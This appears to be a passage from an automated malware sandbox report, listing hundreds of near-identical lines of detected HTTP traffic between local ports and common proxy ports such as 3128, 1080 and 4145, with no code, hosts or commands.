                  Source: unknownNetwork traffic detected: HTTP traffic on port 50445 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 60283
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50331 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50448 -> 5432
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50346 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 39789
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50500 -> 8889
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50480 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50375 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50508 -> 4833
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50422 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50510 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10008 -> 50222
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 6009
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50388 -> 9091
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9401 -> 50284
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50503 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50471 -> 35358
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50596 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50645 -> 57447
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50473 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50652 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50483 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50626 -> 4527
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50549 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50658 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50487 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50665 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 24360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 38088
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50660 -> 44809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50661 -> 17464
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50469 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50582 -> 10001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50171
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 50448
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 5555
                  Source: unknownNetwork traffic detected: HTTP traffic on port 128 -> 50168
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50641 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 3880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50562 -> 61553
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50446 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50702 -> 36580
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50540 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50746 -> 37847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50573 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50603 -> 20060
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50550 -> 9091
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 9090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50575 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50733 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 84
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 37920
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50775 -> 53281
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50627 -> 8192
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 50322
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50695 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 2792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50834 -> 58330
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 12581
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50382 -> 8899
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50807 -> 25137
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50586 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50637 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50885 -> 11320
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50711 -> 10000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 9990
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50793 -> 19600
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50841 -> 57728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50706 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50886 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50384 -> 60964
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50422
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50903 -> 3503
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50857 -> 27360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8060 -> 50122
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50276 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50762 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50753 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50933 -> 32884
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50823 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50844 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50927 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50818 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50815 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 50582
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50875 -> 1082
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50805 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50677 -> 9090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50923 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50926 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50907 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50839 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50858 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50473
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50895 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50262 -> 36073
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 5199
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50487
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50987 -> 22785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50973 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50988 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50404 -> 25675
                  Source: unknownNetwork traffic detected: HTTP traffic on port 999 -> 50549
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50983 -> 9764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50868 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50921 -> 14888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 14076
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50904 -> 29796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50935 -> 8118
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 39789
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50979 -> 49547
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 5401
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50500 -> 8889
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 12217
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 6666
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51005 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50995 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50958 -> 5088
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 6030
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50970 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 50920
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50938 -> 23128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50237 -> 8879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50287 -> 10102
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51016 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9090 -> 49855
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50955 -> 8088
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9091 -> 50550
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50909 -> 5000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 59040
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50989 -> 9123
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50976 -> 9050
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50971 -> 49093
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 50711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50963 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50930 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 40975
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50990 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50573
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51040 -> 36580
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50645 -> 57447
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51024 -> 47851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51004 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50455 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51006 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50660 -> 44809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50626 -> 4527
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50661 -> 17464
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50741 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51078 -> 8585
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50751 -> 7779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51050 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50823
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51052 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50844
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50885 -> 11320
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51055 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51039 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50775 -> 53281
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50818
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51068 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50471 -> 35358
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1082 -> 50875
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51075 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51086 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51085 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50903 -> 3503
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51042 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50342 -> 55029
                  Source: unknownNetwork traffic detected: HTTP traffic on port 14888 -> 50921
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51063 -> 59045
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9990 -> 49806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50388 -> 9091
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50807 -> 25137
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51090 -> 57728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9090 -> 50677
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50933 -> 32884
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8899 -> 50382
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51076 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51080 -> 20060
                  Source: unknownNetwork traffic detected: HTTP traffic on port 999 -> 49927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50562 -> 61553
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9123 -> 50989
                  Source: unknownNetwork traffic detected: HTTP traffic on port 23128 -> 50938
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51109 -> 27360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50868
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50338 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51123 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51071 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51058 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51132 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51136 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8088 -> 50955
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50384 -> 60964
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50590 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51133 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9050 -> 50976
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51164 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50267
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 50909
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51172 -> 9764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50327 -> 32930
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47851 -> 51024
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50793 -> 19600
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51134 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50987 -> 22785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 60283
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50930
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50451 -> 22167
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51169 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51149 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51086
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51160 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51092 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 999 -> 50990
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50637 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50586 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51166 -> 4154
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51146 -> 9050
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51143 -> 32588
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51226 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50479 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51274 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51280 -> 5050
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51288 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51167 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51324 -> 62244
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51268 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51328 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51330 -> 8585
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51276 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50552 -> 32100
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51278 -> 64943
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51243 -> 32708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51307 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51203 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51106 -> 9091
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50447 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51210 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51354 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 6009
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51207 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51042
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51204 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51271 -> 10007
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51235 -> 30000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50500 -> 8889
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51356 -> 43520
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51234 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50904 -> 29796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51290 -> 5566
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50541 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51368 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51259 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51232 -> 82
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51389 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50276 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 50322
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50839 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 39789
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50404 -> 25675
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8118 -> 50935
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50885 -> 11320
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 12581
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51339 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50953 -> 26592
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50502 -> 8181
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51310 -> 32650
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50531 -> 6005
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51281 -> 7777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50692 -> 57495
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51430 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51344 -> 10000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51361 -> 10011
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51346 -> 31673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50645 -> 57447
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50633 -> 6011
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50731 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51134
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51460 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 5555
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50903 -> 3503
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51462 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50654 -> 8088
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51435 -> 8197
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51395 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51382 -> 42072
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50805
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51411 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51532 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50835 -> 16691
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50971 -> 49093
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 2792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50806 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50734 -> 39652
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 51058
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51450 -> 20074
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51421 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50660 -> 44809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50748 -> 19767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51354
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50859 -> 1555
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50725 -> 47225
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50626 -> 4527
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50661 -> 17464
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51432 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51566 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51461 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50933 -> 32884
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51439 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50869 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51553 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51554 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50802 -> 8083
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51555 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51556 -> 57728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 3306
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51585 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50262 -> 36073
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51452 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51586 -> 2512
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51476 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 84
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51525 -> 6010
                  Source: unknownNetwork traffic detected: HTTP traffic on port 32708 -> 51243
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4154 -> 51166
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51319 -> 8899
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50893 -> 47460
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50775 -> 53281
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50880 -> 17228
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51584 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51583 -> 27360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50919 -> 62762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10007 -> 51271
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51597 -> 8585
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5566 -> 51290
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51063 -> 59045
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50447
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51557 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50871 -> 43712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50947 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51600 -> 9764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51591 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51611 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51160
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51601 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51621 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 999 -> 49846
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49829
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50807 -> 25137
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 51344
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10011 -> 51361
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51593 -> 20060
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51011 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51643 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50770 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 16379 -> 49832
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 5401
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8585 -> 51597
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50237 -> 8879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50984 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51661 -> 64943
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51664 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51627 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51596 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51025 -> 58402
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 12217
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51626 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51771 -> 45650
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51669 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51356 -> 43520
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51633 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 6009 -> 49867
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9091 -> 51106
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49910
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51534 -> 8828
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51276 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 20074 -> 51450
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51663 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51678 -> 7777
